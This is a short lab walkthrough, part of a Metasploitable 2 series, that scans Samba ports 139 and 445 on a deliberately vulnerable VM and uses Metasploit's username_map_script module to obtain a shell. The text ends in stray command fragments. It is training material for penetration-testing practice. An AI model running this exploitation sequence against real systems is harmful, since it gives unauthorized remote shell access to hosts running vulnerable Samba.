Metasploitable 2: Ports 139, 445
This is part V of the Metasploitable 2 series. In part I the lab was prepared, in part II we tested port 21, in part III we tested port 25, in part IV it was port 80. You can follow these articles here.
In this part we’re going to scan SAMBA ports 139 and 445.
SAMBA is the open source implementation of the Windows File Sharing Protocol. Let’s find more information about the service running behind these ports. Lets do a nmap scan:
> db_nmap -sV -p 139,445 192.168.231.109
And now use a scanner module:
> use auxiliary/scanner/smb/smb_version
> show options
> run
We got Samba version 3.0.20. Now search though Searchploit:
There is our attack vector. Go back to MSF and search for the module with:
> grep samba search username map script
> use exploit/multi/samba/username_map_script
> show options
> run
Execute and obtain shell:
Conclusion
In this article we scanned for SAMBA, found the version running, determine it was exploitable and obtained a shell.
> search samba
use